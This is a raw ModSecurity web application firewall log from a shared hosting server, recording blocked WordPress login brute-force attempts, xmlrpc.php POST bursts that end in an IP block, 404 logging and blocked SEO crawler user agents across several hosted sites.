[Tue May 26 18:17:25.720120 2026] [security2:error] [pid 983082:tid 983251] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWXLvhpIlZJOtze4s17AAAAKw"]
[Tue May 26 18:17:27.146485 2026] [security2:error] [pid 983082:tid 983149] [remote 74.7.241.58:44740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWWX7vhpIlZJOtze4s2LAAA5UI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:17:27.927736 2026] [security2:error] [pid 983082:tid 983133] [remote 163.61.60.30:34238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWX7vhpIlZJOtze4s2MAAAoDI"]
[Tue May 26 18:17:28.722525 2026] [security2:error] [pid 983082:tid 983317] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWX7vhpIlZJOtze4s2KwAAAO4"]
[Tue May 26 18:17:29.269491 2026] [security2:error] [pid 983082:tid 983150] [remote 141.95.202.18:44208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWYLvhpIlZJOtze4s2QwAAxkM"]
[Tue May 26 18:17:29.822077 2026] [security2:error] [pid 983082:tid 983158] [remote 141.95.202.18:44208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWYbvhpIlZJOtze4s2UwAAuEs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:17:31.896905 2026] [security2:error] [pid 983082:tid 983225] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWYrvhpIlZJOtze4s2aQAAAJI"]
[Tue May 26 18:17:32.155063 2026] [security2:error] [pid 983082:tid 983136] [remote 147.93.168.136:46428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.168.93.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWWY7vhpIlZJOtze4s2fwAA-TU"]
[Tue May 26 18:17:34.110229 2026] [security2:error] [pid 983082:tid 983212] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWZbvhpIlZJOtze4s2lQAAAIU"]
[Tue May 26 18:17:36.822131 2026] [security2:error] [pid 983082:tid 983230] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWZ7vhpIlZJOtze4s2wAAAAJc"]
[Tue May 26 18:17:37.091329 2026] [security2:error] [pid 983082:tid 983241] [client 74.7.241.176:33624] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWWaLvhpIlZJOtze4s21AAAonI"]
[Tue May 26 18:17:37.091364 2026] [security2:error] [pid 983082:tid 983241] [client 74.7.241.176:33624] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWWaLvhpIlZJOtze4s21AAAonI"]
[Tue May 26 18:17:37.357969 2026] [security2:error] [pid 983082:tid 983226] [client 74.7.241.157:44868] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWWabvhpIlZJOtze4s24QAAk0E"]
[Tue May 26 18:17:37.373085 2026] [security2:error] [pid 983082:tid 983300] [client 74.7.241.176:33632] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWWabvhpIlZJOtze4s24gAA3Uc"], referer: https://www.tea.canopykaapi.com/robots.txt
[Tue May 26 18:17:39.417876 2026] [security2:error] [pid 983082:tid 983244] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWarvhpIlZJOtze4s29QAAAKU"]
[Tue May 26 18:17:42.049502 2026] [security2:error] [pid 983082:tid 983215] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWbLvhpIlZJOtze4s3JgAAAIg"]
[Tue May 26 18:17:44.252724 2026] [security2:error] [pid 983082:tid 983267] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWb7vhpIlZJOtze4s3UwAAALw"]
[Tue May 26 18:17:46.091243 2026] [security2:error] [pid 983082:tid 983302] [client 113.184.152.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWcbvhpIlZJOtze4s3cgAAAN8"]
[Tue May 26 18:17:46.111309 2026] [security2:error] [pid 983082:tid 983254] [client 114.119.150.5:34097] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/mortgage-calculators.html"] [unique_id "ahWWcrvhpIlZJOtze4s3kQAAAK8"], referer: https://www.txtlinks.com/24/Finance_and_Investment/184/
[Tue May 26 18:17:46.671175 2026] [security2:error] [pid 983082:tid 983168] [remote 163.61.60.30:38616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWcrvhpIlZJOtze4s3mQAAv1U"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:17:46.832866 2026] [security2:error] [pid 983082:tid 983167] [remote 18.209.220.99:11479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWcrvhpIlZJOtze4s3mAAAjlQ"]
[Tue May 26 18:17:46.841332 2026] [security2:error] [pid 983082:tid 983336] [client 47.128.26.126:28900] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/robots.txt"] [unique_id "ahWWcrvhpIlZJOtze4s3nQAAAQE"]
[Tue May 26 18:17:47.385574 2026] [security2:error] [pid 983082:tid 983220] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWcbvhpIlZJOtze4s3jQAAAI0"]
[Tue May 26 18:17:48.454037 2026] [security2:error] [pid 983082:tid 983132] [remote 216.185.214.209:41328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWdLvhpIlZJOtze4s3tgAA9TE"]
[Tue May 26 18:17:49.701189 2026] [security2:error] [pid 983082:tid 983296] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWdLvhpIlZJOtze4s3vAAAANk"]
[Tue May 26 18:17:52.284805 2026] [security2:error] [pid 983082:tid 983301] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWd7vhpIlZJOtze4s36AAAAN4"]
[Tue May 26 18:17:54.806201 2026] [security2:error] [pid 983082:tid 983316] [client 35.230.102.232:52899] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahWWervhpIlZJOtze4s4MgAAAO0"]
[Tue May 26 18:17:54.921715 2026] [security2:error] [pid 983082:tid 983273] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWebvhpIlZJOtze4s4GQAAAMI"]
[Tue May 26 18:17:56.696914 2026] [security2:error] [pid 983082:tid 983310] [client 185.191.171.4:13510] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-18th/day/2023-01-22/"] [unique_id "ahWWfLvhpIlZJOtze4s4awAAAOc"]
[Tue May 26 18:17:56.697042 2026] [security2:error] [pid 983082:tid 983310] [client 185.191.171.4:13510] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-18th/day/2023-01-22/"] [unique_id "ahWWfLvhpIlZJOtze4s4awAAAOc"]
[Tue May 26 18:17:57.194992 2026] [security2:error] [pid 983082:tid 983313] [client 35.230.102.232:52899] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWfLvhpIlZJOtze4s4YAAAAOo"]
[Tue May 26 18:17:57.566215 2026] [security2:error] [pid 983082:tid 983322] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWfLvhpIlZJOtze4s4YwAAAPM"]
[Tue May 26 18:17:57.573511 2026] [security2:error] [pid 983082:tid 983311] [client 35.230.102.232:53855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWfbvhpIlZJOtze4s4eQAAAOg"]
[Tue May 26 18:17:58.036575 2026] [security2:error] [pid 983082:tid 983245] [client 35.230.102.232:53999] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWfbvhpIlZJOtze4s4hAAAAKY"]
[Tue May 26 18:17:58.421686 2026] [security2:error] [pid 983082:tid 983306] [client 35.230.102.232:54143] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWfrvhpIlZJOtze4s4jQAAAOM"]
[Tue May 26 18:17:58.814199 2026] [security2:error] [pid 983082:tid 983318] [client 35.230.102.232:54302] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWfrvhpIlZJOtze4s4lQAAAO8"]
[Tue May 26 18:17:58.951775 2026] [security2:error] [pid 983082:tid 983190] [remote 162.241.152.21:38184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWWfrvhpIlZJOtze4s4lgAArWs"]
[Tue May 26 18:17:59.245171 2026] [security2:error] [pid 983082:tid 983212] [client 35.230.102.232:54540] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWf7vhpIlZJOtze4s4pQAAAIU"]
[Tue May 26 18:17:59.703402 2026] [security2:error] [pid 983082:tid 983309] [client 35.230.102.232:54725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWf7vhpIlZJOtze4s4rwAAAOY"]
[Tue May 26 18:17:59.953799 2026] [security2:error] [pid 983082:tid 983323] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWfrvhpIlZJOtze4s4mwAAAPQ"]
[Tue May 26 18:18:00.083309 2026] [security2:error] [pid 983082:tid 983303] [client 35.230.102.232:54929] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWgLvhpIlZJOtze4s4tAAAAOA"]
[Tue May 26 18:18:00.556763 2026] [security2:error] [pid 983082:tid 983328] [client 35.230.102.232:55081] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWgLvhpIlZJOtze4s4ugAAAPk"]
[Tue May 26 18:18:00.958495 2026] [security2:error] [pid 983082:tid 983306] [client 35.230.102.232:55245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWgLvhpIlZJOtze4s4vgAAAOM"]
[Tue May 26 18:18:01.364107 2026] [security2:error] [pid 983082:tid 983232] [client 35.230.102.232:55390] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from  - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWgbvhpIlZJOtze4s4yQAAAJk"]
[Tue May 26 18:18:01.364146 2026] [security2:error] [pid 983082:tid 983232] [client 35.230.102.232:55390] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWgbvhpIlZJOtze4s4yQAAAJk"]
[Tue May 26 18:18:01.696810 2026] [security2:error] [pid 983082:tid 983260] [client 35.230.102.232:55565] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWgbvhpIlZJOtze4s44QAAALU"]
[Tue May 26 18:18:01.696940 2026] [security2:error] [pid 983082:tid 983260] [client 35.230.102.232:55565] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahWWgbvhpIlZJOtze4s44QAAALU"]
[Tue May 26 18:18:02.038433 2026] [security2:error] [pid 983082:tid 983314] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWgbvhpIlZJOtze4s41gAAAOs"]
[Tue May 26 18:18:02.320023 2026] [security2:error] [pid 983082:tid 983116] [remote 222.165.190.235:49400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWWgrvhpIlZJOtze4s47gAA0SE"]
[Tue May 26 18:18:03.368322 2026] [security2:error] [pid 983082:tid 983107] [remote 162.241.152.21:38184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWWg7vhpIlZJOtze4s5AAAAqhg"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 18:18:04.436502 2026] [security2:error] [pid 983082:tid 983228] [client 185.251.19.116:21909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWWhLvhpIlZJOtze4s5IQAAAJU"]
[Tue May 26 18:18:05.005428 2026] [security2:error] [pid 983082:tid 983262] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWhLvhpIlZJOtze4s5GgAAALc"]
[Tue May 26 18:18:06.446257 2026] [security2:error] [pid 983082:tid 983134] [remote 194.163.139.224:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWWhrvhpIlZJOtze4s5VAAAmjM"]
[Tue May 26 18:18:08.019161 2026] [security2:error] [pid 983082:tid 983319] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWhrvhpIlZJOtze4s5XgAAAPA"]
[Tue May 26 18:18:08.279505 2026] [security2:error] [pid 983082:tid 983320] [client 47.128.60.50:28744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "m2wealthadvisor.com"] [uri "/robots.txt"] [unique_id "ahWWiLvhpIlZJOtze4s5hwAAAPE"]
[Tue May 26 18:18:09.392592 2026] [security2:error] [pid 983082:tid 983257] [client 34.105.92.25:52866] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWh7vhpIlZJOtze4s5fwAAALI"]
[Tue May 26 18:18:10.003821 2026] [security2:error] [pid 983082:tid 983248] [client 34.105.92.25:54820] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWibvhpIlZJOtze4s5ngAAAKk"]
[Tue May 26 18:18:10.519374 2026] [security2:error] [pid 983082:tid 983276] [client 34.105.92.25:55067] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWirvhpIlZJOtze4s5qwAAAMU"]
[Tue May 26 18:18:10.834608 2026] [security2:error] [pid 983082:tid 983331] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWibvhpIlZJOtze4s5oQAAAPw"]
[Tue May 26 18:18:11.046210 2026] [security2:error] [pid 983082:tid 983213] [client 34.105.92.25:55288] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWirvhpIlZJOtze4s5uAAAAIY"]
[Tue May 26 18:18:11.610792 2026] [security2:error] [pid 983082:tid 983334] [client 34.105.92.25:55527] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWi7vhpIlZJOtze4s5xAAAAP8"]
[Tue May 26 18:18:11.715748 2026] [security2:error] [pid 983082:tid 983278] [client 208.91.198.85:21720] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-content/uploads/2023/03/logo-fms-1.jpg"] [unique_id "ahWWi7vhpIlZJOtze4s5zwAAAMc"]
[Tue May 26 18:18:12.181786 2026] [security2:error] [pid 983082:tid 983264] [client 34.105.92.25:55806] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWi7vhpIlZJOtze4s50AAAALk"]
[Tue May 26 18:18:12.741253 2026] [security2:error] [pid 983082:tid 983280] [client 34.105.92.25:56105] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/xmlrpc.php"] [unique_id "ahWWjLvhpIlZJOtze4s54AAAAMk"]
